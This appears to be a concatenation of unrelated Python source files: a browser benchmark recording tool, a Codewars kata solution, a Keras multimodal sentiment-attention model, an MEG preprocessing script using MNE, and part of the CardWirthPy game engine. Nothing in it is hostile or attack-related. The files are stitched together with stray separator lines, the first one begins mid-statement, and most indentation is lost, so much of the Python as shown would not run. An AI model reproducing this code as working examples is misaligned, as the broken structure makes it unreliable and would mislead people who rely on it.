'Also enables WPR debug output to STDOUT.')
self._SetArgumentDefaults()
def _SetArgumentDefaults(self):
self._parser.set_defaults(output_formats=['none'])
def _ParseArgs(self, args=None):
args_to_parse = sys.argv[1:] if args is None else args
self._parser.parse_args(args_to_parse)
def _ProcessCommandLineArgs(self):
story_runner.ProcessCommandLineArgs(self._parser, self._options)
if self._options.use_live_sites:
self._parser.error("Can't --use-live-sites while recording")
if self._benchmark is not None:
self._benchmark.ProcessCommandLineArgs(self._parser, self._options)
def _GetStorySet(self, target):
if self._benchmark is not None:
return self._benchmark.CreateStorySet(self._options)
story_set = _MaybeGetInstanceOfClass(target, self._page_set_base_dir,
story.StorySet)
if story_set is None:
sys.stderr.write('Target %s is neither benchmark nor story set.\n'
% target)
if not self._HintMostLikelyBenchmarksStories(target):
sys.stderr.write(
'Found no similar benchmark or story. Please use '
'--list-benchmarks or --list-stories to list candidates.\n')
self._parser.print_usage()
sys.exit(1)
return story_set
def _HintMostLikelyBenchmarksStories(self, target):
def _Impl(all_items, category_name):
candidates = matching.GetMostLikelyMatchedObject(
six.iteritems(all_items), target, name_func=lambda kv: kv[1].Name())
if candidates:
sys.stderr.write('\nDo you mean any of those %s below?\n' %
category_name)
_PrintPairs([(k, v.Description()) for k, v in candidates], sys.stderr)
return True
return False
has_benchmark_hint = _Impl(
_GetSubclasses(self._base_dir, benchmark.Benchmark), 'benchmarks')
has_story_hint = _Impl(
_GetSubclasses(self._base_dir, story.StorySet), 'stories')
return has_benchmark_hint or has_story_hint
def Record(self, results):
assert self._story_set.wpr_archive_info, (
'Pageset archive_data_file path must be specified.')
# Always record the benchmark one time only.
self._options.pageset_repeat = 1
self._story_set.wpr_archive_info.AddNewTemporaryRecording()
self._record_page_test.CustomizeBrowserOptions(self._options)
story_runner.RunStorySet(
self._record_page_test,
self._story_set,
self._options,
results)
def HandleResults(self, results, upload_to_cloud_storage):
if results.had_failures or results.had_skips:
logging.warning('Some pages failed and/or were skipped. The recording '
'has not been updated for these pages.')
results.Finalize()
self._story_set.wpr_archive_info.AddRecordedStories(
[run.story for run in results.IterStoryRuns() if run.ok],
upload_to_cloud_storage,
target_platform=self._record_page_test.platform)
def Main(environment, **log_config_kwargs):
# the log level is set in browser_options
log_config_kwargs.pop('level', None)
log_config_kwargs.setdefault('format', DEFAULT_LOG_FORMAT)
logging.basicConfig(**log_config_kwargs)
parser = argparse.ArgumentParser(
usage='Record a benchmark or a story (page set).')
parser.add_argument(
'benchmark',
help=('benchmark name. This argument is optional. If both benchmark name '
'and story name are specified, this takes precedence as the '
'target of the recording.'),
nargs='?')
parser.add_argument('--story', help='story (page set) name')
parser.add_argument('--list-stories', dest='list_stories',
action='store_true', help='list all story names.')
parser.add_argument('--list-benchmarks', dest='list_benchmarks',
action='store_true', help='list all benchmark names.')
parser.add_argument('--upload', action='store_true',
help='upload to cloud storage.')
args, extra_args = parser.parse_known_args()
if args.list_benchmarks or args.list_stories:
if args.list_benchmarks:
_PrintAllBenchmarks(environment.top_level_dir, sys.stderr)
if args.list_stories:
_PrintAllStories(environment.top_level_dir, sys.stderr)
return 0
target = args.benchmark or args.story
if not target:
    sys.stderr.write('Please specify a target (benchmark or story). Please '
                     'refer to the usage below\n\n')
parser.print_help()
return 0
binary_manager.InitDependencyManager(environment.client_configs)
# TODO(crbug.com/1111556): update WprRecorder so that it handles the
# difference between recording a benchmark vs recording a story better based
# on the distinction between args.benchmark & args.story
with WprRecorder(environment.top_level_dir,
target, extra_args) as wpr_recorder:
results = wpr_recorder.CreateResults()
wpr_recorder.Record(results)
wpr_recorder.HandleResults(results, args.upload)
return min(255, results.num_failed)
|
python
|
"""Kata url: https://www.codewars.com/kata/61123a6f2446320021db987d."""
from typing import Optional
def prev_mult_of_three(n: int) -> Optional[int]:
while n % 3:
n //= 10
return n or None
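# Worked examples (computed from the function above):
#   prev_mult_of_three(36)   -> 36   (already a multiple of three)
#   prev_mult_of_three(1244) -> 12   (1244 -> 124 -> 12, dropping last digits)
#   prev_mult_of_three(25)   -> None (25 -> 2 -> 0, and 0 is falsy)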
|
python
|
import numpy as np, json
import pickle, sys, argparse
from keras.models import Model
from keras import backend as K
from keras import initializers
from keras.optimizers import RMSprop
from keras.utils import to_categorical
from keras.callbacks import EarlyStopping, Callback, ModelCheckpoint
from keras.layers import *
from sklearn.metrics import classification_report, confusion_matrix, precision_recall_fscore_support, accuracy_score
global seed
seed = 1337
np.random.seed(seed)
import gc
from sklearn.metrics import mean_squared_error
from scipy.stats import pearsonr
from scipy.spatial.distance import cosine
#=============================================================
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
#=============================================================
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.log_device_placement = True
set_session(tf.Session(config=config))
#==============================================================
def calc_valid_result(result, valid_label, valid_mask, print_detailed_results=False):
true_label=[]
predicted_label=[]
for i in range(result.shape[0]):
for j in range(result.shape[1]):
if valid_mask[i,j]==1:
true_label.append(np.argmax(valid_label[i,j] ))
predicted_label.append(np.argmax(result[i,j] ))
if print_detailed_results:
print ("Confusion Matrix :")
print (confusion_matrix(true_label, predicted_label))
print ("Classification Report :")
print (classification_report(true_label, predicted_label))
# print ("Accuracy ", accuracy_score(true_label, predicted_label))
return accuracy_score(true_label, predicted_label)
def attention(att_type, x, y):
if att_type == 'simple':
m_dash = dot([x, y], axes=[2,2])
m = Activation('softmax')(m_dash)
h_dash = dot([m, y], axes=[2,1])
return multiply([h_dash, x])
elif att_type == 'gated':
alpha_dash = dot([y, x], axes=[2,2])
alpha = Activation('softmax')(alpha_dash)
x_hat = Permute((2, 1))(dot([x, alpha], axes=[1,2]))
return multiply([y, x_hat])
else:
print ('Attention type must be either simple or gated.')
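# Shape note (assuming inputs of shape (batch, timesteps, features) as produced
# by the TimeDistributed layers below): 'simple' scores every pair of timesteps
# with m = softmax(x . y^T), attends over y via h' = m . y, and gates x
# elementwise; 'gated' instead attends over x and gates y elementwise.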
def mmmu(td_text, td_audio, td_video):
va_att = attention('simple', td_video, td_audio)
vt_att = attention('simple', td_video, td_text)
av_att = attention('simple', td_audio, td_video)
at_att = attention('simple', td_audio, td_text)
tv_att = attention('simple', td_text, td_video)
ta_att = attention('simple', td_text, td_audio)
return concatenate([va_att, vt_att, av_att, at_att, tv_att, ta_att, td_video, td_audio, td_text])
def musa(td_text, td_audio, td_video):
vv_att = attention('simple', td_video, td_video)
tt_att = attention('simple', td_text, td_text)
aa_att = attention('simple', td_audio, td_audio)
return concatenate([aa_att, vv_att, tt_att, td_video, td_audio, td_text])
def mmuu(td_text, td_audio, td_video, td_units, timedistributed, r_units):
    # timedistributed and r_units are locals of the caller and must be passed in
attention_features = []
for j in range(max_segment_len):
m1 = Lambda(lambda x: x[:, j:j+1, :])(td_video)
m2 = Lambda(lambda x: x[:, j:j+1, :])(td_audio)
m3 = Lambda(lambda x: x[:, j:j+1, :])(td_text)
utterance_features = concatenate([m1, m2, m3], axis=1)
mmuu_attention = attention('simple', utterance_features, utterance_features)
attention_features.append(mmuu_attention)
merged_attention = concatenate(attention_features, axis=1)
if timedistributed:
merged_attention = Lambda(lambda x: K.reshape(x, (-1, max_segment_len, 3*td_units)))(merged_attention)
else:
merged_attention = Lambda(lambda x: K.reshape(x, (-1, max_segment_len, 3*r_units)))(merged_attention)
return concatenate([merged_attention, td_video, td_audio, td_text])
def featuresExtraction():
global train_text, train_audio, train_video, train_label, train_mask
global valid_text, valid_audio, valid_video, valid_label, valid_mask
global test_text, test_audio, test_video, test_label, test_mask
global max_segment_len
text = np.load('MOSEI/text.npz',mmap_mode='r')
audio = np.load('MOSEI/audio.npz',mmap_mode='r')
video = np.load('MOSEI/video.npz',mmap_mode='r')
train_text = text['train_data']
train_audio = audio['train_data']
train_video = video['train_data']
valid_text = text['valid_data']
valid_audio = audio['valid_data']
valid_video = video['valid_data']
test_text = text['test_data']
test_audio = audio['test_data']
test_video = video['test_data']
train_label = video['trainSentiLabel']
train_label = to_categorical(train_label>=0)
valid_label = video['validSentiLabel']
valid_label = to_categorical(valid_label>=0)
test_label = video['testSentiLabel']
test_label = to_categorical(test_label>=0)
train_length = video['train_length']
valid_length = video['valid_length']
test_length = video['test_length']
max_segment_len = train_text.shape[1]
train_mask = np.zeros((train_video.shape[0], train_video.shape[1]), dtype='float')
valid_mask = np.zeros((valid_video.shape[0], valid_video.shape[1]), dtype='float')
test_mask = np.zeros((test_video.shape[0], test_video.shape[1]), dtype='float')
for i in xrange(len(train_length)):
train_mask[i,:train_length[i]]=1.0
for i in xrange(len(valid_length)):
valid_mask[i,:valid_length[i]]=1.0
for i in xrange(len(test_length)):
test_mask[i,:test_length[i]]=1.0
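# The masks built above hold 1.0 for real utterances and 0.0 for padding; they
# are passed as `sample_weight` with sample_weight_mode='temporal' below, so
# padded timesteps contribute nothing to the loss.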
def multimodal_cross_attention(attn_type, recurrent, timedistributed):
featuresExtraction()
    # run each model `runs` times with different seeds and keep the best result
runs = 1
best_accuracy = 0
for i in range(runs):
drop0 = 0.3
drop1 = 0.3
r_drop = 0.3
td_units = 100
r_units = 300
in_text = Input(shape=(train_text.shape[1], train_text.shape[2]))
in_audio = Input(shape=(train_audio.shape[1], train_audio.shape[2]))
in_video = Input(shape=(train_video.shape[1], train_video.shape[2]))
masked_text = Masking(mask_value=0)(in_text)
masked_audio = Masking(mask_value=0)(in_audio)
masked_video = Masking(mask_value=0)(in_video)
rnn_text = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_text)
rnn_audio = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_audio)
rnn_video = Bidirectional(GRU(r_units, return_sequences=True, dropout=r_drop, recurrent_dropout=r_drop), merge_mode='concat')(masked_video)
inter_text = Dropout(drop0)(rnn_text)
inter_audio = Dropout(drop0)(rnn_audio)
inter_video = Dropout(drop0)(rnn_video)
td_text = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_text))
td_audio = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_audio))
td_video = Dropout(drop1)(TimeDistributed(Dense(td_units, activation='relu'))(inter_video))
if attn_type == 'mmmu': ## cross modal cross utterance attention ##
merged = mmmu(td_text, td_audio, td_video)
elif attn_type == 'musa': ## uni modal cross utterance attention ##
merged = musa(td_text, td_audio, td_video)
elif attn_type == 'mmuu': ## cross modal uni utterance attention ##
            merged = mmuu(td_text, td_audio, td_video, td_units, timedistributed, r_units)
elif attn_type == 'None': ## no attention ##
merged = concatenate([td_text, td_audio, td_video])
else:
print ("attn type must be either 'mmmu' or 'mu_sa' or 'mmuu' or 'None'.")
# ==================================================================================================================
output = TimeDistributed(Dense(2, activation='softmax'))(merged)
model = Model([in_text, in_audio, in_video], output)
model.compile(optimizer='adam', loss='binary_crossentropy', sample_weight_mode='temporal', metrics=['accuracy'])
# ==================================================================================================================
path = 'weights/trimodal_run_' + str(i) + '.hdf5'
check1 = EarlyStopping(monitor='val_loss', patience=10)
check2 = ModelCheckpoint(path, monitor='val_acc', verbose=0, save_best_only=True, mode='max')
np.random.seed(i)
history = model.fit([train_text, train_audio, train_video], train_label,
epochs=100,
batch_size=32,
sample_weight=train_mask,
shuffle=True,
callbacks=[check1, check2],
validation_data=([valid_text, valid_audio, valid_video], valid_label, valid_mask),
verbose=1)
acc = max(history.history['val_acc'])
if acc > best_accuracy:
best_accuracy = acc
model.load_weights(path)
result = model.predict([test_text, test_audio, test_video])
np.ndarray.dump(result,open('results/prediction_run_' + str(i) +'.np', 'wb'))
################### release gpu memory ###################
K.clear_session()
del model
#del history
gc.collect()
###################### write results #######################
'''open('results/dushyant/tri_result.txt', 'a').write('Recurrent: ' + str(recurrent) +
', TimeDistributed: ' + str(timedistributed) +
', Attention type: ' + str(attn_type) +
', Best Accuracy: ' + str(best_accuracy) + '\n'*2 )'''
print ('Best valid accuracy:', best_accuracy)
print ('-'*127)
if __name__=="__main__":
multimodal_cross_attention(attn_type='mmmu', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='musa', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='mmuu', recurrent=True, timedistributed=True)
multimodal_cross_attention(attn_type='None', recurrent=True, timedistributed=True)
|
python
|
import mne
import mne_bids
import numpy as np
from config import fname, n_jobs
report = mne.open_report(fname.report)
# Load raw data (tSSS already applied)
raw = mne_bids.read_raw_bids(fname.raw, fname.bids_root)
raw.load_data()
report.add_figs_to_section(raw.plot_psd(), 'PSD of unfiltered raw', 'Raw', replace=True)
raw = raw.notch_filter([50, 100])
report.add_figs_to_section(raw.plot_psd(), 'PSD of notch filtered raw', 'Raw', replace=True)
# Fit ICA to the continuous data
raw_detrended = raw.copy().filter(1, None)
ica = mne.preprocessing.ICA(n_components=0.99).fit(raw_detrended)
ica.save(fname.ica)
# Get ICA components that capture eye blinks
eog_epochs = mne.preprocessing.create_eog_epochs(raw_detrended)
_, eog_scores = ica.find_bads_eog(raw_detrended)
ica.exclude = np.flatnonzero(abs(eog_scores) > 0.2)
report.add_figs_to_section(ica.plot_scores(eog_scores), 'Correlation between ICA components and EOG channel', 'ICA',
replace=True)
report.add_figs_to_section(ica.plot_properties(eog_epochs, picks=ica.exclude),
['Properties of component %02d' % e for e in ica.exclude], 'ICA', replace=True)
report.add_figs_to_section(ica.plot_overlay(eog_epochs.average()), 'Signal removed by ICA', 'ICA', replace=True)
# Create short epochs for evoked analysis
epochs = mne.Epochs(raw, *mne.events_from_annotations(raw), tmin=-0.2, tmax=0.5, reject=None, baseline=(-0.2, 0),
preload=True)
epochs_clean = ica.apply(epochs)
epochs_clean.save(fname.epochs, overwrite=True)
evoked = epochs_clean.average()
evoked.save(fname.evoked)
report.add_figs_to_section(epochs.average().plot_joint(times=[0.035, 0.1]),
['Evokeds without ICA (grads)', 'Evokeds without ICA (mags)'], 'Sensor level', replace=True)
report.add_figs_to_section(epochs_clean.average().plot_joint(times=[0.035, 0.1]),
['Evokeds after ICA (grads)', 'Evokeds after ICA (mags)'], 'Sensor level', replace=True)
# Create longer epochs for rhythmic analysis
epochs_long = mne.Epochs(raw, *mne.events_from_annotations(raw), tmin=-1.5, tmax=2, reject=None, baseline=None,
preload=True)
epochs_long = ica.apply(epochs_long)
epochs_long.save(fname.epochs_long, overwrite=True)
# Visualize spectral content of the longer epochs
freqs = np.logspace(np.log10(5), np.log10(40), 20)
epochs_tfr = mne.time_frequency.tfr_morlet(epochs_long, freqs, n_cycles=7, return_itc=False, n_jobs=n_jobs)
fig = epochs_tfr.plot_topo(baseline=(-1, 0), mode='logratio')
fig.set_size_inches((12, 12))
report.add_figs_to_section(fig, 'Time-frequency decomposition', 'Spectrum', replace=True)
report.add_figs_to_section(epochs_tfr.plot(picks=['MEG 1143'], baseline=(-1, 0), mode='logratio'), 'Time-frequency decomposition for MEG 1143', 'Spectrum', replace=True)
report.add_figs_to_section(epochs_tfr.plot(picks=['MEG 2033'], baseline=(-1, 0), mode='logratio'), 'Time-frequency decomposition for MEG 2033', 'Spectrum', replace=True)
report.save(fname.report, overwrite=True, open_browser=False)
report.save(fname.report_html, overwrite=True, open_browser=False)
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import itertools
import time
import datetime
import threading
import traceback
import shutil
import re
import math
import wx
import pygame
from pygame.locals import MOUSEBUTTONDOWN, MOUSEBUTTONUP, KEYDOWN, KEYUP, USEREVENT
import cw
from cw.util import synclock
# Temporary module created by build_exe.py;
# build time information is obtained from cw.versioninfo
try:
import versioninfo
except ImportError:
versioninfo = None
class CWPyRunningError(Exception):
pass
class _Singleton(object):
"""継承専用クラス"""
def __new__(cls, *args, **kwargs):
if cls is _Singleton:
raise NotImplementedError("Can not create _Singleton instance.")
else:
instance = object.__new__(cls)
cls.__new__ = classmethod(lambda cls, *args, **kwargs: instance)
return cls.__new__(cls, *args, **kwargs)
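    # Note (illustrative, not part of the original comments): after the first
    # instantiation, __new__ is replaced by a classmethod that always returns
    # that instance, so `Sub() is Sub()` holds for any subclass Sub.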
class CWPy(_Singleton, threading.Thread):
def __init__(self, setting, frame=None):
if frame and not hasattr(self, "frame"):
threading.Thread.__init__(self)
self.rsrc = None
            self.frame = frame  # parent frame
            # Compatibility database
            self.sct = cw.setting.ScenarioCompatibilityTable()
            # System coupons used for version detection etc.
            self.syscoupons = cw.setting.SystemCoupons()
self.ydata = None
self._running = False
self.init_pygame(setting)
def init_pygame(self, setting):
"""使用変数等はここ参照。"""
self.setting = setting # 設定
self.status = "Title"
self.update_titlebar()
self.expand_mode = setting.expandmode # 画面拡大条件
self.is_processing = False # シナリオ読込中か
self.is_debuggerprocessing = False # デバッガの処理が進行中か(宿の再ロードなど)
self.is_decompressing = False # アーカイブ展開中か
self.update_scaling = False # 画面スケール変更中か
        # Initialize pygame
        fullscreen = self.setting.is_expanded and self.setting.expandmode == "FullScreen"
        self.scr, self.scr_draw, self.scr_fullscreen, self.clock = cw.util.init(cw.SIZE_GAME, "", fullscreen, self.setting.soundfonts,
                                                                                fullscreensize=self.frame.get_displaysize())
        if fullscreen:
            self.set_fullscreen(True)
        # Background
        self.background = None
        # Status bar
        self.statusbar = None
        # Instance for capturing key input (all key input is captured on the wx side)
        self.keyevent = cw.eventrelay.KeyEventRelay()
        # Dice instance (used for all kinds of random processing)
        self.dice = cw.dice.Dice()
        # Base (Yado) data
        self.ydata = None
        # Scenario data or system data
        self.sdata = None
        self.classicdata = None
        # Path of the currently selected base
        self.yadodir = ""
        self.tempdir = ""
        # BattleEngine instance
        self.battle = None
        # Area ID for the victory event
        self.winevent_areaid = None
        # Flag for whether any input events occurred during the main loop
        self.has_inputevent = False
        # Animation cut flag
        self.cut_animation = False
        # Wait to show menu cards until there is input
        self.wait_showcards = False
        # Dialog display nesting level
        self._showingdlg = 0
        # Flag for whether a curtain sprite is being shown
        self._curtained = False
        # Whether cards can be selected
        self.is_pcardsselectable = False
        self.is_mcardsselectable = True
        # Flag for whether a card show/hide animation is in progress
        self._dealing = False
        # Automatic card placement flag
        self._autospread = True
        # Game over flag (checked when event processing finishes)
        self._gameover = False
        self._forcegameover = False
        # Currently selected sprite (SelectableSprite)
        self.selection = None
        # While True, the selected sprite cannot be clicked
        self.lock_menucards = False
        # True while the battle actions of members other than the selected one are shown
        self._show_allselectedcards = False
        # Flag for whether the party is being shown
        self.is_showparty = False
        # Flag for whether the backlog is being shown
        self._is_showingbacklog = False
        # Data for card operations (CardHeader)
        self.selectedheader = None
        # Whether debug mode is on
        self.debug = self.setting.debug
        # Directory of the selected skin
        self.skindir = self.setting.skindir
        # True immediately after loading the base
        self._clear_changed = False
        # MusicInterface instances
        self.music = [None] * cw.bassplayer.MAX_BGM_CHANNELS
        for i in xrange(cw.bassplayer.MAX_BGM_CHANNELS):
            self.music[i] = cw.util.MusicInterface(i, int(self.setting.vol_master*100))
        # Last played sound effects (two kinds: system and scenario)
        self.lastsound_scenario = [None] * cw.bassplayer.MAX_SOUND_CHANNELS
        self.lastsound_system = None
        # EventInterface instance
        self.event = cw.event.EventInterface()
        # Sprite groups
        self.cardgrp = pygame.sprite.LayeredDirty()
        self.pcards = []
        self.mcards = []
        self.mcards_expandspchars = set()
        self.curtains = []
        self.topgrp = pygame.sprite.LayeredDirty()
        self.backloggrp = pygame.sprite.LayeredDirty()
        self.sbargrp = pygame.sprite.LayeredDirty()
        # Cards in use
        self.inusecards = []
        self.guardcards = []
        # Card temporarily taken out of the backpack and in use
        self.card_takenouttemporarily = None
        # Area ID
        self.areaid = 1
        # Data kept from before moving to a special area
        self.pre_areaids = []
        self.pre_mcards = []
        self.pre_dialogs = []
        # Input events of various kinds
        self.mousein = (0, 0, 0)
        self.mousepos = (-1, -1)
        self.wxmousepos = (-1, -1)
        self.mousemotion = False
        self.keyin = ()
        self.events = []
        # list, index (used for card selection via keyboard)
        self.list = []
        self.index = -1
        # Cursor position at the moment the selection was changed with arrow keys or the mouse wheel
        self.wheelmode_cursorpos = (-1, -1)
        # Dictionary of menu cards per flag
        self._mcardtable = {}
        # True if the list of menu cards needs to be
        # updated when the event finishes
        self._after_update_mcardlist = False
        # Data of the classic scenario being played, if any
        self.classicdata = None
        # Event handler
        self.eventhandler = cw.eventhandler.EventHandler()
        self._log_handler = None  # handler while the message log is shown
        # Tab position of the settings dialog
        self.settingtab = 0
        # Party record for saving;
        # created when entering the disband area
        self._stored_partyrecord = None
        # Whether member positions must be recalculated due to target removal
        self._need_disposition = False
        # Per-scenario breakpoint information
        self.breakpoint_table = {}
        self._load_breakpoints()
        # Sprites currently animating
        self.animations = set()
        # Temporarily overrides the card speed when no speed is set;
        # disabled when -1
        self.override_dealspeed = -1
        # Temporarily overrides all card speeds;
        # disabled when -1
        self.force_dealspeed = -1
        # Sprites whose displayed content should change due to JPDC capture etc.
        self.file_updates = set()
        # Whether a background update has occurred
        self.file_updates_bg = False
        # Scenario selected in the scenario selection dialog
        self.selectedscenario = None
        # Scenario whose archive is being extracted
        self.expanding = u""
        # Progress information for the extraction
        self.expanding_min = 0
        self.expanding_max = 100
        self.expanding_cur = 0
        # Name of the current cursor
        self.cursor = ""
        self.change_cursor(force=True)
        # Text log
        self.advlog = cw.advlog.AdventurerLogger()
        # True when lazy redraw is used
        self._lazy_draw = False
        # Region that should be redrawn in the next draw
        self._lazy_clip = None
        # Set the game state to "Title"
        self.exec_func(self.startup, loadyado=True)
def set_fullscreen(self, fullscreen):
"""wx側ウィンドウのフルスクリーンモードを切り替える。"""
def func():
if self.frame.IsFullScreen() == fullscreen:
return
if sys.platform == "win32":
self.frame.ShowFullScreen(fullscreen)
else:
self.frame.SetMaxSize((-1, -1))
self.frame.SetMinSize((-1, -1))
self.frame.ShowFullScreen(fullscreen)
if fullscreen:
dsize = self.frame.get_displaysize()
self.frame.SetClientSize(dsize)
self.frame.panel.SetSize(dsize)
self.frame.SetMaxSize(self.frame.GetBestSize())
self.frame.SetMinSize(self.frame.GetBestSize())
else:
self.frame.SetClientSize(cw.wins(cw.SIZE_GAME))
self.frame.panel.SetSize(cw.wins(cw.SIZE_GAME))
self.frame.SetMaxSize(self.frame.GetBestSize())
self.frame.SetMinSize(self.frame.GetBestSize())
self.frame.exec_func(func)
def set_clientsize(self, size):
"""wx側ウィンドウの表示域サイズを設定する。"""
def func():
self.frame.SetClientSize(size)
self.frame.panel.SetSize(size)
self.frame.exec_func(func)
def _load_breakpoints(self):
"""シナリオごとのブレークポイント情報をロードする。
"""
if not os.path.isfile("Breakpoints.xml"):
return
data = cw.data.xml2element("Breakpoints.xml")
for e_sc in data:
            if e_sc.tag != "Breakpoints":
continue
scenario = e_sc.get("scenario", "")
author = e_sc.get("author", "")
key = (scenario, author)
bps = set()
for e in e_sc:
                if e.tag != "Breakpoint":
continue
if e.text:
bps.add(e.text)
self.breakpoint_table[key] = bps
def _save_breakpoints(self):
"""シナリオごとのブレークポイント情報を保存する。
"""
if isinstance(self.sdata, cw.data.ScenarioData):
self.sdata.save_breakpoints()
element = cw.data.make_element("AllBreakpoints")
for key, bps in self.breakpoint_table.iteritems():
scenario, author = key
e_sc = cw.data.make_element("Breakpoints", attrs={"scenario":scenario,
"author":author})
for bp in bps:
if bp:
e = cw.data.make_element("Breakpoint", bp)
e_sc.append(e)
if len(e_sc):
element.append(e_sc)
path = "Breakpoints.xml"
if len(element):
etree = cw.data.xml2etree(element=element)
etree.write(path)
elif os.path.isfile(path):
cw.util.remove(path)
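        # The written Breakpoints.xml has this shape (element names taken from
        # the code above; attribute values are illustrative):
        # <AllBreakpoints>
        #   <Breakpoints scenario="..." author="...">
        #     <Breakpoint>...</Breakpoint>
        #   </Breakpoints>
        # </AllBreakpoints>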
    def _init_resources(self):
        """Initialize the resources tied to the skin."""
        try:
            self.init_fullscreenparams()
            # Resources (dict)
if self.rsrc:
self.rsrc.dispose()
rsrc = self.rsrc
self.rsrc = None
self.rsrc = cw.setting.Resource(self.setting)
            # System sound effects (dict)
            self.sounds = self.rsrc.sounds
            # Other skin-bundled sound effects (dict)
            self.skinsounds = self.rsrc.skinsounds
            # System messages (dict)
            self.msgs = self.rsrc.msgs
            # Action card data (CardHeader);
            # not reset when only the scale changes
if rsrc:
self.rsrc.actioncards = rsrc.actioncards
self.rsrc.backpackcards = rsrc.backpackcards
else:
self.rsrc.actioncards = self.rsrc.get_actioncards()
self.rsrc.backpackcards = self.rsrc.get_backpackcards()
            # Background sprite
            if not self.background:
                self.background = cw.sprite.background.BackGround()
                self._update_clip()
            # Status bar sprite
            if not self.statusbar:
                self.statusbar = cw.sprite.statusbar.StatusBar()
            # Status bar clip
            self.sbargrp.set_clip(self.statusbar.rect)
self.update_fullscreenbackground()
return True
except cw.setting.NoFontError:
def func():
s = (u"CardWirthPyの実行に必要なフォントがありません。\n"
u"Data/Font以下にフォントをインストールしてください。")
wx.MessageBox(s, u"メッセージ", wx.OK|wx.ICON_ERROR, cw.cwpy.frame)
cw.cwpy.frame.Destroy()
cw.cwpy.frame.exec_func(func)
return False
def init_sounds(self):
"""スキン付属の効果音を再読込する。"""
self.rsrc.init_sounds()
# システム効果音(辞書)
self.sounds = self.rsrc.sounds
# その他のスキン付属効果音(辞書)
self.skinsounds = self.rsrc.skinsounds
def _update_clip(self):
clip = pygame.Rect(cw.s((0, 0)), cw.s(cw.SIZE_AREA))
self.cardgrp.set_clip(clip)
self.topgrp.set_clip(clip)
self.backloggrp.set_clip(clip)
def update_skin(self, skindirname, changearea=True, restartop=True, afterfunc=None):
self.file_updates.clear()
if self.status == "Title" and restartop:
changearea = False
self.cardgrp.remove(self.mcards)
self.mcards = []
self.mcards_expandspchars.clear()
self.background.bgs = []
elif self.status == "GameOver":
changearea = False
changed = self.ydata and self.ydata.is_changed()
scedir = self.setting.get_scedir()
oldskindirname = self.setting.skindirname
self.setting.skindirname = skindirname
self.setting.init_skin()
if self.ydata:
self.ydata.set_skinname(skindirname, self.setting.skintype)
self.skindir = self.setting.skindir
oldskindir = cw.util.join_paths(u"Data/Skin", oldskindirname)
newskindir = cw.util.join_paths(u"Data/Skin", skindirname)
self.background.update_skin(oldskindir, newskindir)
def repl_cardimg(sprite):
if hasattr(sprite, "cardimg"):
for path in sprite.cardimg.paths:
if path.path.startswith(oldskindir):
path.path = path.path.replace(oldskindir, newskindir)
for sprite in self.get_pcards():
repl_cardimg(sprite)
if self.sdata:
self.sdata.update_skin()
if not self.is_battlestatus() and changearea and not (self.status == "Title" and self.topgrp.sprites()):
removed_mcards = []
for sprite in self.mcards[:]:
if not isinstance(sprite, cw.sprite.card.FriendCard):
self.cardgrp.remove(sprite)
self.mcards.remove(sprite)
self.mcards_expandspchars.discard(sprite)
if self.is_playingscenario():
self.sdata.change_data(self.areaid, data=self.sdata.data)
else:
self.sdata.change_data(self.areaid, data=None)
self.set_mcards(self.sdata.get_mcarddata(data=self.sdata.data), False, True, setautospread=True)
self.deal_cards()
if self.is_playingscenario():
self.background.reload(doanime=False, ttype=("None", "None"), redraw=False, nocheckvisible=True)
else:
self.background.load(self.sdata.get_bgdata(), False, ("None", "None"), redraw=False)
if not self.is_playingscenario():
self.sdata.start_event(keynum=1)
self.clear_selection()
if self.rsrc:
self.rsrc.dispose()
self.rsrc = None
def func():
assert self.rsrc
if afterfunc:
afterfunc()
if self.is_battlestatus() and self.battle:
for ccard in self.get_pcards("unreversed"):
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
for ccard in self.get_ecards("unreversed"):
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
for ccard in self.get_fcards():
ccard.deck.set(ccard)
if self.battle.is_ready():
ccard.decide_action()
self.update_titlebar()
            if scedir != self.setting.get_scedir():
self.setting.lastscenario = []
self.setting.lastscenariopath = u""
if self.ydata:
self.ydata._changed = changed
if self.status == "Title" and restartop:
                # If on the title screen, rewind to before the logo display
                if self.topgrp.sprites():
                    # If animating, cancel first and then rewind
self.exec_func(self.startup, loadyado=False)
raise cw.event.EffectBreakError()
else:
self.startup(loadyado=False)
else:
for music in self.music:
music.play(music.path, updatepredata=False)
self.update_scale(cw.UP_WIN, changearea, rsrconly=True, afterfunc=func)
def update_yadoinitial(self):
if not self.ydata or self.ydata.party or self.is_playingscenario():
return
if self.ydata.is_empty() and not self.ydata.is_changed():
if self.areaid == 1:
self.change_area(3)
else:
if self.areaid == 3:
self.change_area(1)
def update_titlebar(self):
"""タイトルバー文字列を更新する。"""
self.set_titlebar(self.create_title())
def create_title(self):
"""タイトルバー文字列を生成する。"""
s = self.setting.titleformat
d = self.get_titledic()
return cw.util.format_title(s, d)
def get_titledic(self, with_datetime=False, for_fname=False):
"""タイトルバー文字列生成用の情報を辞書で取得する。"""
vstr = []
for v in cw.APP_VERSION:
vstr.append(str(v))
vstr = u".".join(vstr)
d = { "application":cw.APP_NAME, "skin":self.setting.skinname, "version":vstr }
if versioninfo:
d["build"] = versioninfo.build_datetime
if self.ydata:
d["yado"] = self.ydata.name
if self.ydata.party:
d["party"] = self.ydata.party.name
if self.status.startswith("Scenario") or self.status == "GameOver":
sdata = self.ydata.losted_sdata if self.ydata and self.ydata.losted_sdata else self.sdata
d["scenario"] = sdata.name
d["author"] = sdata.author
d["path"] = sdata.fpath
d["file"] = os.path.basename(sdata.fpath)
versionhint = sdata.get_versionhint()
#PyLite todo nen
#d["scenario"] = self.sdata.name
#d["author"] = self.sdata.author
#d["path"] = self.sdata.fpath
#d["file"] = os.path.basename(self.sdata.fpath)
#versionhint = self.sdata.get_versionhint()
